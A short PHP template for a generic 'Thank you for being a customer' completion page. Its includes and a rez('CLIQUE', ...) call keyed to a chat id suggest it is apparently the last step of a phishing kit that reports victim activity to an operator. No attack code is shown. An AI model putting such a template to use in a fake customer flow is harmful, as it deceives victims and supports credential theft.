<?php
require_once('case/ab.php');
require_once('lib/components/header.php');
rez("CLIQUE", [], $rez['chatid']['clique']);
?>

<div class="row slice-screen">
    <div class="content">
        <div id="api" data-name="Unified" role="main" class="form-section">
            <div class="heading">
                <center>
                    <img src="lib/assets/sent.gif" width="150" />
                </center>
                <h1>Thank you for being a customer of ours!
                </h1>



                <p>You can now exit this page.</p>
            </div>

        </div>
    </div>
</div>

<?php

require_once('lib/components/footer.php');
